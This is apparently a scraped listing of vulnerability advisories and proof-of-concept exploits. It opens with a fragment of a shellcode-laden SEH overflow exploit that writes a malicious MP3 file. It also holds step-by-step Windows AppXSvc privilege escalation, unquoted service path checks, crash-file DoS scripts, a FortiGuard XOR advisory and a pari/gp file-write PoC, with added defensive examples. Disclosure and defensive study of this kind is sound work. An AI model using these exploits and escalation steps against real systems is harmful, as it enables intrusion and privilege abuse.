buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )

payload = buffer + NSEH + SEH + nops + buf + pad
try:
    f = open("exploit.mp3", "w")
    print "[+] Creating %s bytes evil payload.." % len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

Remote File Inclusion / Local File Inclusion Attack And Defense Techniques


Whitepaper called Remote File Inclusion / Local File Inclusion Attack and Defense Techniques. This paper focuses on PHP-based attacks.


MD5 | 34f21e6ac1aa7a3653bb417dc20e8aaf


Microsoft Windows AppXsvc Deployment Extension Privilege Escalation


Microsoft Windows AppXsvc deployment extension suffers from a privilege escalation vulnerability.


MD5 | 6491894f34aeaeb814791df0ccc185a4

# Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
# Date: 2019-11-22
# Exploit Author: Abdelhamid Naceri
# Vendor Homepage: www.microsoft.com
# Tested on: Windows 10 1903
# CVE : CVE-2019-1385


Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability

Class: Local Elevation of Privileges

Description:
This PoC exploits a vulnerability in the AppX Deployment Service (AppXSvc). Abusing
it allows an attacker to overwrite or create a file as SYSTEM, which can result in
elevation of privilege. There are two ways to abuse the issue.

Steps to reproduce:

[1] Arbitrary file creation
1- Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup into a junction to
   the target directory, for example "c:\".
2- Open PowerShell and execute the command: Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
3- Check the target directory; the file should now have been created.
4- Enjoy :)

[2] Arbitrary file overwrite
1- Create a temporary directory under %temp%\
2- Create a hardlink to the target file inside that temporary directory.
3- Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup into a junction to
   the temporary directory.
4- Open PowerShell and execute the command: Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
5- Check the target file again.

Limitations:
When 'MicrosoftEdge.exe' is created it inherits the directory's permissions, so in
most cases the created file will not be writable by a normal user. A simple example
where it is: the default ACL on "c:\" prevents Authenticated Users from creating
files but not from modifying them, so abusing the vulnerability in "c:\" yields an
arbitrary file that is also writable by a normal user.
Files that are not writable by SYSTEM cannot be overwritten. The PoC does not check
for this, because if the file is not readable by the current user the check would
return false even when the file is writable by SYSTEM. NOTE: you can also overwrite
files that you cannot even read.
For file creation, make sure the path is writable by SYSTEM, otherwise the PoC will
fail. I think 99% of folders are writable by SYSTEM.
Platform:
This has been tested on a fully patched system (latest patch -> November 2019) :
OS Edition: Microsoft Windows 10 Home
Os Version: 1903
OS Version Info: 18362.418

Additional Info
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuildLabEx = 18362.1.amd64fre.19h1_release.190318-1202


Expected result:
The deployment process should fail with "ERROR_ACCESS_IS_DENIED".
Observed result:
The deployment process overwrites or creates an arbitrary file as
"LOCAL SYSTEM".

NOTE : It was patched on 7/11/19
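Both variants above rely on a privileged service following a link placed by the user: a junction on the path (variant [1]) or a hard link at the target (variant [2]). As an added example, not the PoC's code and not Microsoft's fix, the following shows the write discipline such a service needs: refuse any path component that is a reparse point, open the final name without following links, and refuse a target with more than one hard link. The demo rebuilds both layouts in a temp directory using symlinks and hard links (standing in for Windows junctions), so it runs on any OS that supports them; the directory names are constructed.

```python
import os
import shutil
import stat
import tempfile

# Added example, not the PoC's code: link-safe file creation for a privileged
# service writing into a user-controlled directory.
FILE_ATTRIBUTE_REPARSE_POINT = 0x400   # junctions, symlinks, mount points on Windows


def is_reparse_point(path: str) -> bool:
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return True
    return bool(getattr(st, "st_file_attributes", 0) & FILE_ATTRIBUTE_REPARSE_POINT)


def resolve_without_links(base: str, rel_path: str) -> str:
    """Join rel_path onto base, refusing '..' and any component that is a reparse point."""
    cur = base
    for comp in os.path.normpath(rel_path).split(os.sep):
        if comp in ("", "."):
            continue
        if comp == "..":
            raise PermissionError("path traversal refused: %s" % rel_path)
        cur = os.path.join(cur, comp)
        if os.path.lexists(cur) and is_reparse_point(cur):
            raise PermissionError("refusing to follow reparse point: %s" % cur)
    return cur


def safe_write(base: str, rel_path: str, data: bytes) -> str:
    """Create or overwrite base/rel_path without following links or hard links."""
    target = resolve_without_links(base, rel_path)
    flags = os.O_WRONLY | os.O_CREAT | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(target, flags, 0o644)
    try:
        if os.fstat(fd).st_nlink > 1:      # a hard link planted at the target
            raise PermissionError("target has multiple hard links: %s" % target)
        os.ftruncate(fd, 0)                # truncate only after the checks pass
        os.write(fd, data)
    finally:
        os.close(fd)
    return target


def demo() -> dict:
    """Rebuild both advisory variants in a temp dir and report what safe_write does."""
    root = tempfile.mkdtemp()
    try:
        base = os.path.join(root, "WindowsApps")          # constructed stand-in
        victim_dir = os.path.join(root, "victim")
        os.makedirs(base)
        os.makedirs(victim_dir)
        victim = os.path.join(victim_dir, "important.txt")
        with open(victim, "wb") as f:
            f.write(b"original")
        outcome = {}
        # Variant [1]: 'Backup' replaced by a link to a directory of the user's choosing
        os.symlink(victim_dir, os.path.join(base, "Backup"), target_is_directory=True)
        try:
            safe_write(base, os.path.join("Backup", "MicrosoftEdge.exe"), b"x")
            outcome["junction"] = "written"
        except PermissionError:
            outcome["junction"] = "refused"
        # Variant [2]: a real directory whose file is a hard link to the victim file
        os.makedirs(os.path.join(base, "Backup2"))
        os.link(victim, os.path.join(base, "Backup2", "important.txt"))
        try:
            safe_write(base, os.path.join("Backup2", "important.txt"), b"x")
            outcome["hardlink"] = "written"
        except PermissionError:
            outcome["hardlink"] = "refused"
        # Honest case: a fresh file in a plain directory is written normally
        safe_write(base, os.path.join("Backup2", "new.txt"), b"ok")
        with open(os.path.join(base, "Backup2", "new.txt"), "rb") as f:
            outcome["plain"] = f.read()
        with open(victim, "rb") as f:
            outcome["victim"] = f.read()
        return outcome
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())   # {'junction': 'refused', 'hardlink': 'refused', 'plain': b'ok', 'victim': b'original'}
```

The component walk is still a check-then-use sequence; on Windows the robust form is to open each directory with a handle that does not follow reparse points and create the file relative to that handle, which is what the checks here approximate.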

Easy-Hide-IP 5.0.0.3 Unquoted Service Path


Easy-Hide-IP version 5.0.0.3 suffers from an EasyRedirect unquoted service path vulnerability.


MD5 | ead9531a29759a937a984144199f3806

# Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path
# Date: 2019-11-22
# Exploit Author: Rene Cortes S
# Vendor Homepage: https://easy-hide-ip.com
# Software Link: https://easy-hide-ip.com
# Version: 5.0.0.3
# Tested on: Windows 7 Professional Service Pack 1

##########################################################################################################################

Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

EasyRedirect EasyRedirect C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe Auto


##############################################################################################################################################

Service info:

C:\Users\user>sc qc EasyRedirect
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: EasyRedirect
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : EasyRedirect
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem

#########################################################################################################################

SMPlayer 19.5.0 Denial Of Service


SMPlayer version 19.5.0 suffers from a denial of service vulnerability.


MD5 | eed61cf4d482a8606b80548507b8cfd6

# Title : SMPlayer 19.5.0 - Denial of Service (PoC)
# Tested on : Windows 7 (64 bit)
# Vulnerable Software: SMPlayer v 19.5.0
# Exploit Author: Malav Vyas
# Vendor Homepage: https://smplayer.info
# Version : 19.5.0
# Software Link : https://smplayer.info/en/downloads

# POC
# run this python file, which will generate attack.m3u file
# .m3u file is used as a playlist
# this python file will generate a .m3u file with 25000 "A" characters.
# Open this file in SMPlayer two times.
# The second time, the buffer is overflowed and the player crashes, resulting in a denial of service.
# For more details, please refer to video

f="attack.m3u"

bof = "A"*25000

writeFile = open(f, "w")
writeFile.write(bof)
writeFile.close()

InTouch Machine Edition 8.1 SP1 Denial Of Service


InTouch Machine Edition version 8.1 SP1 denial of service proof of concept exploit.


MD5 | e557240fd076d97a5c76cc55eb0fda35

# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2019-11-16
# Vendor Homepage: https://on.wonderware.com/
# Software Link : https://on.wonderware.com/intouch-machine-edition
# Tested Version: 8.1 SP1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# InTouch Machine Edition 8.1 SP1.py


# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InTouch_Machine_Edition_8.1.py
# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
# 3.- Open ITME v8.1 InTouch Machine Edition
# 4.- On Graficos select Atributos
# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
#!/usr/bin/env python


buffer = "\x41" * 1026
f = open ("InTouch_Machine_Edition_8.1.txt", "w")
f.write(buffer)
f.close()

Waves MaxxAudio Drivers 1.1.6.0 Unquoted Service Path


Waves MaxxAudio Drivers version 1.1.6.0 suffers from an unquoted service path vulnerability.


MD5 | 9da05fdfc69efee7cc4ac5f888eb7a91

# Exploit Title: Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-24
# Vendor Homepage: https://www.dell.com/
# Software Link : https://www.dell.com/support/home/mx/es/mxbsdt1/drivers/driversdetails?driverid=vwpkk
# Tested Version: 1.1.6.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Audio" | findstr /i /v """

Waves Audio Services WavesSysSvc C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Auto

# Service info:

C:\>sc qc WavesSysSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WavesSysSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
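The ProShow Producer, Easy-Hide-IP and Waves MaxxAudio advisories above all show the same pattern in `sc qc` output: an unquoted BINARY_PATH_NAME containing spaces for a service that starts automatically as LocalSystem. As an added example (not from any of those advisories), the following auditor reads `sc qc` output regardless of the Windows UI language, reports whether the image path is unquoted with spaces, lists the locations Windows would try before the real executable (which must not exist and must not be creatable by standard users), and prints the `sc config` command that fixes it. The three sample outputs are constructed to mirror the listings above.

```python
import re

# Added example, not from the advisories: unquoted service path auditor.
# SAMPLES are constructed to mirror the advisories' `sc qc` listings.
SAMPLES = {
    "ScsiAccess": r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ScsiAccess
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe
        DISPLAY_NAME       : ScsiAccess
        SERVICE_START_NAME : LocalSystem
""",
    "EasyRedirect": r"""[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: EasyRedirect
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe
        NOMBRE_INICIO_SERVICIO: LocalSystem
""",
    "Quoted": r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Quoted
        BINARY_PATH_NAME   : "C:\Program Files\Vendor\svc.exe" -k net
        SERVICE_START_NAME : LocalSystem
""",
}

DRIVE_PATH = re.compile(r'^"?[A-Za-z]:\\')


def parse_sc_qc(output: str) -> dict:
    """Key/value lines of `sc qc` output in printed order, keys as printed (any language)."""
    info = {}
    for line in output.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip():
            info[key.strip()] = value.strip()
    return info


def binary_path(info: dict):
    """The image path is the first value that looks like a drive path, whatever its label."""
    for value in info.values():
        if DRIVE_PATH.match(value):
            return value
    return None


def split_image_path(image_path: str):
    """Split an unquoted image path into (executable, arguments) at the first '.exe'."""
    m = re.match(r"(.*?\.exe)(?:\s+(.*))?$", image_path, re.IGNORECASE)
    if m:
        return m.group(1), (m.group(2) or "")
    return image_path, ""


def is_unquoted_with_spaces(image_path: str) -> bool:
    if image_path.lstrip().startswith('"'):
        return False
    exe, _ = split_image_path(image_path)
    return " " in exe


def lookup_candidates(exe: str):
    """Paths CreateProcess tries, in order, for an unquoted executable containing
    spaces (documented Windows behaviour): each space-delimited prefix plus '.exe'."""
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]


def audit_service(sc_qc_output: str) -> dict:
    info = parse_sc_qc(sc_qc_output)
    name = next(iter(info.values()), None)       # sc qc prints the service name first
    path = binary_path(info)
    result = {"service": name, "image_path": path, "unquoted": False, "watch": [], "fix": None}
    if path and is_unquoted_with_spaces(path):
        exe, args = split_image_path(path)
        result["unquoted"] = True
        result["watch"] = lookup_candidates(exe)[:-1]   # locations that must stay absent
        quoted = '\\"%s\\"' % exe + ((" " + args) if args else "")
        result["fix"] = 'sc config %s binPath= "%s"' % (name, quoted)
    return result


if __name__ == "__main__":
    for sample in SAMPLES.values():
        print(audit_service(sample))
```

On a live host, feed it the output of `sc qc <name>` for every service that `wmic service get name,pathname,startmode` lists as Auto, as the advisories do; the `watch` entries are the paths to verify are absent and protected by the default ACL, and `fix` is the remediation to apply.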


InduSoft Web Studio 8.1 SP1 Denial Of Service


InduSoft Web Studio version 8.1 SP1 suffers from a denial of service vulnerability.


MD5 | e9f1d17f28667e30360417690582e950

# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2019-11-23
# Vendor Homepage: http://www.indusoft.com/
# Software Link : http://www.indusoft.com/Products-Downloads
# Tested Version: 8.1 SP1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos"'No Redibujar'/'Deshabilitados' Denial of Service (PoC)
# Discovery by: chuyreds
# Google Dork: chuyrojas1997@gmail.com: chuyreds
# Discovery Date: 23-11-2019
# Vendor Homepage: http://www.indusoft.com/
# Software Link : http://www.indusoft.com/Products-Downloads
# Tested Version: 8.1 SP1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Denial of Service:
# 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py
# 2.- Open InduSoft "Web Studio Edition 8.1 SP1.txt" and copy content to clipboard
# 3.- Open InduSoft Web Studio Edition 8.1 SP1
# 4.- On Graficos select Atributos
# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"


#!/usr/bin/env python

buffer = "\x41" * 1026
f = open ("InduSoft Web Studio Edition 8.1 SP1.txt", "w")
f.write(buffer)
f.close()

iNetTools For iOS 8.20 Denial Of Service


iNetTools for iOS version 8.20 suffers from a denial of service vulnerability.


MD5 | 9bcf97c9fe40f66344be31ec0110c02f

# Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2019-11-25
# Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975
# Software Link: App Store for iOS devices
# Tested Version: 8.20
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.2

# Summary: iNetTools is a suite of network diagnostic tools for iPhone and iPad. It provides essential tools such as
# Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan.
# Steps to Produce the Crash:

# 1.- Run python code: iNetTools.py
# 2.- Copy content to clipboard
# 3.- Open "iNetTools for iOS"
# 4.- Go to "Whois"
# 5.- Paste ClipBoard on "Domain Name"
# 6.- Start
# 7.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 98
print (buffer)

FortiOS 6.0.6 / FortiClientWindows 6.0.6 / FortiClientMac 6.2.1 XOR Encryption


Fortinet products, including FortiGate and Forticlient, regularly send information to Fortinet servers using XOR "encryption" with a static key. Versions affected include FortiOS versions 6.0.6 and below, FortiClientWindows versions 6.0.6 and below, and FortiClientMac versions 6.2.1 and below.


MD5 | 9d942ec809afdd8e4584b2dfc2667c2f

SEC Consult Vulnerability Lab Security Advisory < 20191125-0 >
=======================================================================
title: FortiGuard XOR Encryption
product: Multiple Fortinet Products (see Vulnerable / tested versions)
vulnerable version: Multiple (see Vulnerable / tested versions)
fixed version: Multiple (see Solution)
CVE number: CVE-2018-9195
impact: High
homepage: https://www.fortinet.com
found: 2018-05-16

by: Stefan Viehböck (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"From the start, the Fortinet vision has been to deliver broad, truly
integrated, high-performance security across the IT infrastructure.

We provide top-rated network and content security, as well as secure access
products that share intelligence and work together to form a cooperative
fabric. Our unique security fabric combines Security Processors, an intuitive
operating system, and applied threat intelligence to give you proven security,
exceptional performance, and better visibility and control--while providing
easier administration."

Source: https://www.fortinet.com/corporate/about-us/about-us.html


Business recommendation:
------------------------
The vendor provides a patch and users of affected products are urged to
immediately upgrade to the latest version available.


Vulnerability overview/description:
-----------------------------------
Fortinet products, including FortiGate and FortiClient, regularly send
information to Fortinet servers (DNS: guard.fortinet.com) on
- UDP ports 53 and 8888, and
- TCP port 80 (HTTP POST /fgdsvc)

This cloud communication is used for the FortiGuard Web Filter feature (https://fortiguard.com/webfilter),
FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam)
and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus).

The messages are encrypted using XOR "encryption" with a static key.


The protocol messages contain the following types of information:

**Serial number of the Fortinet product installation** (product type + unique ID).
This information allows an attacker who can **passively monitor** internet traffic to:
- learn which Fortinet products and product types an organization uses
(this is valuable for information gathering, see EquationGroup Fortigate exploits)
- learn which FortiClient installations are part of an organization
- use the FortiClient serial number as a unique identifier to track an individual as
he/she travels the world


**Full HTTP URLs of users web surfing activity** (Web Filter feature).
This information allows an attacker who can **passively monitor** internet traffic
to spy on users' web surfing activity. In cases where SSL inspection is enabled,
even the URLs of HTTPS-encrypted communication are sent via this protocol,
effectively breaking the confidentiality of SSL/TLS.


**Unspecified email data** (AntiSpam feature).
We do not have any further information on what kind of information is sent by the
AntiSpam feature.


**Unspecified AntiVirus data** (AntiVirus feature).
We do not have any further information on what kind of information is sent by the
AntiVirus feature.


By **intercepting and manipulating** internet traffic an attacker can:
Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus features.


Proof of concept:
-----------------
The following Python 3 script decrypts a FortiGuard message (the static XOR key
has been removed from this advisory).


```python
from itertools import cycle

def forti_xor(s1):
    # static key withheld from this advisory; s1 is the raw message as bytes
    xor_key = **removed**
    # XOR every message byte against the key, repeated as often as needed
    message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key)))
    return message

r1 = bytes.fromhex('6968766f606e776c2d2d21262138475c5b5a475b545e475c6b6a776b646e776c6b6a772b646e776c6b6a776b646e776c6b6a776bbadf04036b6a776c616a846f')

print(repr(forti_xor(r1)))
```

In this case the decrypted message contents are:
'\x02\x02\x01\x04\x04\x00\x00\x00FGVMEV0000000000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00...'


Another example:
'\x02\x01\x02\x04úI\x03\x00FG100D3G00000000\x00\x00\...x00\x00+https://v10.vortex-win.data.microsoft.com/\x00'
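What a static repeating XOR key hands to a passive observer, as an added example that is not the advisory's code: the runs of NUL bytes visible in the decrypted samples above are known plaintext, so every ciphertext byte in such a run is a key byte, and an observer who has never seen the key reads it straight off the wire. The example uses a constructed 8-byte demo key in place of the removed FortiGuard key; the message layout (8 header bytes, 16-byte serial, 32 NUL bytes, NUL-terminated URL), the key alignment at message offset 0, the serial and the URL are assumptions made for the demonstration.

```python
from itertools import cycle

# Constructed 8-byte demo key for this added example. The real FortiGuard key was
# removed from the SEC Consult advisory and is not reproduced here.
DEMO_KEY = bytes.fromhex("5f2a7c913e68d40b")

# Assumed message layout, modelled on the decrypted samples in the advisory:
# 8 header bytes, a 16-byte serial number, 32 NUL bytes, then a NUL-terminated URL.
HEADER_LEN = 8
SERIAL_LEN = 16
PAD_LEN = 32


def repeating_xor(data: bytes, key: bytes) -> bytes:
    """XOR data against a cycled key. Encrypting and decrypting are the same call,
    which is exactly why a static key gives no confidentiality."""
    return bytes(c ^ k for c, k in zip(data, cycle(key)))


def build_message(serial: bytes, url: bytes) -> bytes:
    """Constructed plaintext in the assumed layout (not a real FortiGuard message)."""
    header = b"\x02\x01\x02\x04\x00\x00\x00\x00"
    return header + serial.ljust(SERIAL_LEN, b"\x00") + b"\x00" * PAD_LEN + url + b"\x00"


def recover_key(ciphertext: bytes, known: dict, key_len: int):
    """Derive a repeating key of length key_len from known plaintext bytes
    ({offset: plaintext byte}). Returns None when the known bytes contradict each
    other for this key length or leave a key position uncovered."""
    key = [None] * key_len
    for offset, p in known.items():
        k = ciphertext[offset] ^ p
        slot = offset % key_len
        if key[slot] is not None and key[slot] != k:
            return None
        key[slot] = k
    if any(b is None for b in key):
        return None
    return bytes(key)


def recover_key_from_nul_run(ciphertext: bytes, start: int, length: int,
                             max_key_len: int = 32):
    """The NUL padding is known plaintext: each ciphertext byte in that run *is* a
    key byte. Try key lengths from short to long and return the first one the run
    is consistent with (the true period, for a key without internal repetition)."""
    known = {i: 0x00 for i in range(start, start + length)}
    for key_len in range(1, max_key_len + 1):
        key = recover_key(ciphertext, known, key_len)
        if key is not None:
            return key
    return None


def parse_message(plaintext: bytes):
    """Split a decrypted message into (serial, url) under the assumed layout."""
    serial = plaintext[HEADER_LEN:HEADER_LEN + SERIAL_LEN].rstrip(b"\x00")
    body = plaintext[HEADER_LEN + SERIAL_LEN + PAD_LEN:]
    return serial, body.split(b"\x00", 1)[0]


def passive_observer_demo():
    """Constructed capture: what an unpatched device would put on the wire, and what
    someone who never saw the key recovers from it."""
    serial = b"FG100D3G00000000"                          # constructed serial
    url = b"https://intranet.example.com/payroll/2019/"   # constructed URL
    on_the_wire = repeating_xor(build_message(serial, url), DEMO_KEY)

    # Step 1: the observer recovers the key from the padding alone.
    key = recover_key_from_nul_run(on_the_wire, HEADER_LEN + SERIAL_LEN, PAD_LEN)
    # Step 2: from then on every message is readable: product serial and browsed URL.
    recovered_serial, recovered_url = parse_message(repeating_xor(on_the_wire, key))
    return key, recovered_serial, recovered_url


if __name__ == "__main__":
    key, serial, url = passive_observer_demo()
    print("recovered key   :", key.hex())
    print("recovered serial:", serial.decode())
    print("recovered URL   :", url.decode())
```

Once the key is known the same `repeating_xor` call also produces valid-looking messages, which is the active case the advisory describes: an on-path attacker can rewrite FortiGuard requests and responses at will. Nothing in a fixed key and XOR resists either the passive or the active attacker; only a protocol with real encryption and authentication (the vendor's fix) does.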


Vulnerable / tested versions:
-----------------------------
The following versions are affected according to the vendor:
* FortiOS 6.0.6 and below
* FortiClientWindows 6.0.6 and below
* FortiClientMac 6.2.1 and below


The security advisory of the vendor can be found at:
https://fortiguard.com/psirt/FG-IR-18-100


Vendor contact timeline:
------------------------
2018-05-17: Contacting vendor through psirt@fortinet.com, sending advisory with
public PGP key
2018-05-17: Auto-Response: "Thank you for contacting us regarding your
inquiry. We have created a PSIRT ticket for this inquiry"
2018-05-17: Response: "Thank you to report us this vulnerability. I created
an internal incident and I will communicate further with you while
I'm investigating the impact of this."
2018-05-28: Requesting update, "If we don't get an appropriate response (see my
initial email) by the end of next week, we will consider disclosing
the vulnerability without further coordination."
2018-05-28: Auto-Response: "Thank you for contacting us regarding your inquiry.
We have created a PSIRT ticket for this inquiry"
2018-06-05: Requesting update again, "This is the final attempt to contact you",
plus reaching out to Fortinet via Twitter, LinkedIn.
2018-06-05: First response after 3 weeks, developers are working on a fix,
"Please therefore kindly wait for further updates, while we are
coordinating various stakeholders (including FortiGuard servers
maintainers) for a fix."
2018-06-06: Requesting conference call.
2018-06 - 2019-11: Multiple conference calls, discussing technical details, agreeing
on disclosure time
2019-03-28: Fix released in FortiOS 6.2.0
2019-04-01: Fix issued on FortiGuard server side
2019-11-13: Fix released for FortiOS branch 6.0, version 6.0.7
2019-11-25: Public release of security advisory



Solution:
---------
The vendor provides updated versions for the affected products:
* FortiOS 6.0.7 or 6.2.0
* FortiClientWindows 6.2.0
* FortiClientMac 6.2.2

The security advisory of the vendor can be found at: https://fortiguard.com/psirt/FG-IR-18-100


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Stefan Viehböck / @2019


pari/gp 2.x Arbitrary File Overwrite


pari/gp versions 2.9.1 on Debian Stretch and 2.11 on Debian Buster allow arbitrary file write and hence arbitrary code execution.


MD5 | 0ecadd450355ff88db28e7b58b63b32a

pari/gp on debian stable allows arbitrary file write

pari/gp is a CAS (computer algebra system).
pari/gp version 2.9.1 on debian stretch and 2.11 on debian buster
allow arbitrary file write and hence arbitrary code execution.

poc (a .gp script read with \r sets the session logfile to a path of its
choosing, turns logging on, and everything it then prints is written there):
========
\\ a.gp
\\ to run: \r a.gp
\\ point the log at an attacker-chosen path, enable logging, then write to it
default("logfile","/tmp/a.txt");default("log",1);print("log(1)");
========

Of mathematical interest: pari was missing solutions
to Thue equations when assuming GRH (the fix changed a polynomial
bound to an exponential bound):
http://pari.math.u-bordeaux.fr/archives/pari-dev-1207/msg00000.html
t=thue(thueinit(x^3+92*x+1,0),3^3);t

--
CV: https://j.ludost.net/resumegg.pdf
site: http://www.guninski.com
blog: https://j.ludost.net/blog


Microsoft DirectX SDK 2010 Denial Of Service


Microsoft DirectX SDK 2010 suffers from a denial of service vulnerability.


MD5 | 3892d191883979a31381aa6e48af01ca

